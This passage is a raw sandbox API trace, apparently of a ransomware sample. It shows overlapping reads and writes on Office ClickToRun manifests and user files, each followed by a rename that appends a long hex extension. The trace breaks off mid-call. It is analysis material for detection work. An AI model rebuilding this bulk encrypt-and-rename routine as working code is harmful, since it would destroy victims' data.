[0155.954] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0155.954] RtlInterlockedCompareExchange64 () 
returned 0x1 [0155.954] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.958] ReadFile (in: hFile=0x590, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0155.958] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.959] WriteFile (in: hFile=0x590, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0155.960] RtlInterlockedCompareExchange64 () returned 0x0 [0155.960] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.961] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x744a270, ReturnLength=0x73dfc54) returned 0x0 [0155.962] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml", lpString2=".82E4C6DE6D48301C22654DB693074903A098B5CB1BACF3DB23E78C7EBEF10430" | out: 
lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml.82E4C6DE6D48301C22654DB693074903A098B5CB1BACF3DB23E78C7EBEF10430") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml.82E4C6DE6D48301C22654DB693074903A098B5CB1BACF3DB23E78C7EBEF10430" [0155.962] GetProcessHeap () returned 0x270000 [0155.962] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a0) returned 0x31e318 [0155.962] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x73dfc44, FileInformation=0x31e318, Length=0x1a0, FileInformationClass=0xa) returned 0x0 [0155.963] CloseHandle (hObject=0x590) returned 1 [0155.969] GetProcessHeap () returned 0x270000 [0155.970] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0155.970] RtlInterlockedCompareExchange64 () returned 0x1 [0155.970] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.974] ReadFile (in: hFile=0x594, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0155.975] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.975] WriteFile (in: hFile=0x594, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, 
lpOverlapped=0x7422068) returned 1 [0155.976] RtlInterlockedCompareExchange64 () returned 0x0 [0155.976] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.977] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7422118, ReturnLength=0x73dfc54) returned 0x0 [0155.978] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2=".14391C49748062AB066A28AB22BC07848E64B4DF5D1D98DA5FE7E3C5EA884458" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml.14391C49748062AB066A28AB22BC07848E64B4DF5D1D98DA5FE7E3C5EA884458") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml.14391C49748062AB066A28AB22BC07848E64B4DF5D1D98DA5FE7E3C5EA884458" [0155.978] GetProcessHeap () returned 0x270000 [0155.978] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a6) returned 0x4277c78 [0155.978] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x73dfc44, FileInformation=0x4277c78, Length=0x1a6, FileInformationClass=0xa) returned 0x0 [0155.983] CloseHandle (hObject=0x594) returned 1 [0155.990] GetProcessHeap () returned 0x270000 [0155.991] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0155.991] RtlInterlockedCompareExchange64 () returned 0x1 [0155.991] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, 
lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.996] ReadFile (in: hFile=0x594, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0155.997] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.998] WriteFile (in: hFile=0x594, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0156.000] RtlInterlockedCompareExchange64 () returned 0x0 [0156.000] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.001] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7422118, ReturnLength=0x73dfc54) returned 0x0 [0156.002] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2=".54102A65AAA1DC10AF40030B8F0543C674E966BC296158A56EC20505BDC6E734" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.54102A65AAA1DC10AF40030B8F0543C674E966BC296158A56EC20505BDC6E734") 
returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.54102A65AAA1DC10AF40030B8F0543C674E966BC296158A56EC20505BDC6E734" [0156.002] GetProcessHeap () returned 0x270000 [0156.002] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1ac) returned 0x42869e0 [0156.002] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x73dfc44, FileInformation=0x42869e0, Length=0x1ac, FileInformationClass=0xa) returned 0x0 [0156.004] CloseHandle (hObject=0x594) returned 1 [0156.028] GetProcessHeap () returned 0x270000 [0156.029] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0156.029] RtlInterlockedCompareExchange64 () returned 0x1 [0156.029] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.032] WriteFile (in: hFile=0x594, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0156.034] RtlInterlockedCompareExchange64 () returned 0x0 [0156.034] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.035] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x744a270, ReturnLength=0x73dfc54) returned 0x0 [0156.036] lstrcatW (in: 
lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml", lpString2=".5BC0CF90B5E16EFB731BF43D83B5F9814F891E899CE0B3F553AB84AC8FB94677" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml.5BC0CF90B5E16EFB731BF43D83B5F9814F891E899CE0B3F553AB84AC8FB94677") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml.5BC0CF90B5E16EFB731BF43D83B5F9814F891E899CE0B3F553AB84AC8FB94677" [0156.036] GetProcessHeap () returned 0x270000 [0156.036] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x19a) returned 0x3364d0 [0156.036] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x73dfc44, FileInformation=0x3364d0, Length=0x19a, FileInformationClass=0xa) returned 0x0 [0156.038] CloseHandle (hObject=0x594) returned 1 [0156.039] GetProcessHeap () returned 0x270000 [0156.040] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0156.045] RtlInterlockedCompareExchange64 () returned 0x1 [0156.045] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.223] ReadFile (in: hFile=0x594, lpBuffer=0x7492450, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0156.224] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, 
lpOverlapped=0x73dfc58) returned 1 [0156.239] WriteFile (in: hFile=0x594, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0156.240] RtlInterlockedCompareExchange64 () returned 0x1 [0156.240] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.240] ReadFile (in: hFile=0x5b0, lpBuffer=0x75aa7f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x758a6c0 | out: lpBuffer=0x75aa7f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x758a6c0) returned 1 [0156.240] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.240] ReadFile (in: hFile=0x5b4, lpBuffer=0x7600180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0156.241] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.241] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74723c8, ReturnLength=0x73dfc54) returned 0x0 [0156.242] lstrcatW (in: 
lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2=".563ACA39ED0F9FC6D5DFC7CF54A945AA295C57DA3610076BEB767FDE85333359" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.563ACA39ED0F9FC6D5DFC7CF54A945AA295C57DA3610076BEB767FDE85333359") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.563ACA39ED0F9FC6D5DFC7CF54A945AA295C57DA3610076BEB767FDE85333359" [0156.243] GetProcessHeap () returned 0x270000 [0156.243] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1ac) returned 0x4246408 [0156.243] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x73dfc44, FileInformation=0x4246408, Length=0x1ac, FileInformationClass=0xa) returned 0x0 [0156.244] CloseHandle (hObject=0x594) returned 1 [0156.255] GetProcessHeap () returned 0x270000 [0156.258] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0156.258] RtlInterlockedCompareExchange64 () returned 0x2 [0156.258] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.258] WriteFile (in: hFile=0x5b0, lpBuffer=0x75aa7f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x758a6c0 | out: lpBuffer=0x75aa7f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x758a6c0) returned 1 [0156.259] RtlInterlockedCompareExchange64 () returned 0x1 [0156.259] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, 
dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.260] WriteFile (in: hFile=0x5b4, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048) returned 1 [0156.261] RtlInterlockedCompareExchange64 () returned 0x2 [0156.261] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.261] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x758a770, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x758a770, ReturnLength=0x73dfc54) returned 0x0 [0156.263] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml", lpString2=".51BE11C64767BC90CEA6861EE065004515107E8BDF4D9818A920AE838B88F51E" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml.51BE11C64767BC90CEA6861EE065004515107E8BDF4D9818A920AE838B88F51E") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml.51BE11C64767BC90CEA6861EE065004515107E8BDF4D9818A920AE838B88F51E" [0156.263] GetProcessHeap () returned 0x270000 [0156.263] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a2) returned 0x4277fe8 [0156.263] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x73dfc44, FileInformation=0x4277fe8, Length=0x1a2, FileInformationClass=0xa) returned 0x0 [0156.265] CloseHandle (hObject=0x5b0) returned 1 
[0156.270] GetProcessHeap () returned 0x270000 [0156.272] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x758a6c0 | out: hHeap=0x270000) returned 1 [0156.272] RtlInterlockedCompareExchange64 () returned 0x3 [0156.272] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.272] NtQueryObject (in: Handle=0x5b4, ObjectInformationClass=0x1, ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x75e00f8, ReturnLength=0x73dfc54) returned 0x0 [0156.274] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2=".741B0DFEC9162FB89ED607D6E6498CBE755527298847CC4DF4BC7EEC5DF1BA1B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.741B0DFEC9162FB89ED607D6E6498CBE755527298847CC4DF4BC7EEC5DF1BA1B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.741B0DFEC9162FB89ED607D6E6498CBE755527298847CC4DF4BC7EEC5DF1BA1B" [0156.274] GetProcessHeap () returned 0x270000 [0156.274] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1c8) returned 0x432ff60 [0156.275] NtSetInformationFile (FileHandle=0x5b4, IoStatusBlock=0x73dfc44, FileInformation=0x432ff60, Length=0x1c8, FileInformationClass=0xa) returned 0x0 [0156.276] CloseHandle (hObject=0x5b4) returned 1 [0156.293] GetProcessHeap () returned 0x270000 [0156.296] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.302] 
RtlInterlockedCompareExchange64 () returned 0x2 [0156.302] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0163.871] ReadFile (in: hFile=0x5a8, lpBuffer=0x75a26b0, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x7582578 | out: lpBuffer=0x75a26b0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7582578) returned 1 [0163.871] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0163.871] WriteFile (in: hFile=0x5b4, lpBuffer=0x7552400*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75322c8 | out: lpBuffer=0x7552400*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75322c8) returned 1 [0163.873] RtlInterlockedCompareExchange64 () returned 0x2 [0163.873] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0163.873] WriteFile (in: hFile=0x5a8, lpBuffer=0x75a26b0*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7582578 | out: lpBuffer=0x75a26b0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7582578) returned 1 [0163.874] RtlInterlockedCompareExchange64 () returned 0x3 [0163.874] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 
[0163.874] NtQueryObject (in: Handle=0x5b4, ObjectInformationClass=0x1, ObjectInformation=0x7532378, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7532378, ReturnLength=0x73dfc54) returned 0x0 [0163.875] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg", lpString2=".BAD8664082EC7D4008A1A1993259766E7ADF81C52789DB8F594220A593461603" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.BAD8664082EC7D4008A1A1993259766E7ADF81C52789DB8F594220A593461603") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.BAD8664082EC7D4008A1A1993259766E7ADF81C52789DB8F594220A593461603" [0163.875] GetProcessHeap () returned 0x270000 [0163.875] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15c) returned 0x42fb0a8 [0163.876] NtSetInformationFile (FileHandle=0x5b4, IoStatusBlock=0x73dfc44, FileInformation=0x42fb0a8, Length=0x15c, FileInformationClass=0xa) returned 0x0 [0163.937] CloseHandle (hObject=0x5b4) returned 1 [0163.940] GetProcessHeap () returned 0x270000 [0163.941] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75322c8 | out: hHeap=0x270000) returned 1 [0163.948] RtlInterlockedCompareExchange64 () returned 0x1 [0163.948] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0163.949] WriteFile (in: hFile=0x5b8, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x5c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0163.950] RtlInterlockedCompareExchange64 () returned 0x0 [0163.950] 
GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0164.439] ReadFile (in: hFile=0x5ac, lpBuffer=0x7492450, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0164.441] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0164.441] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, ObjectInformation=0x76403b0, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x76403b0, ReturnLength=0x73dfc54) returned 0x0 [0164.444] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\saKgVJ8BvE0.pdf", lpString2=".D11C2449620F7B201A0FB3E5C61679CA38839E198179EA32B42989EBF5C11934" | out: 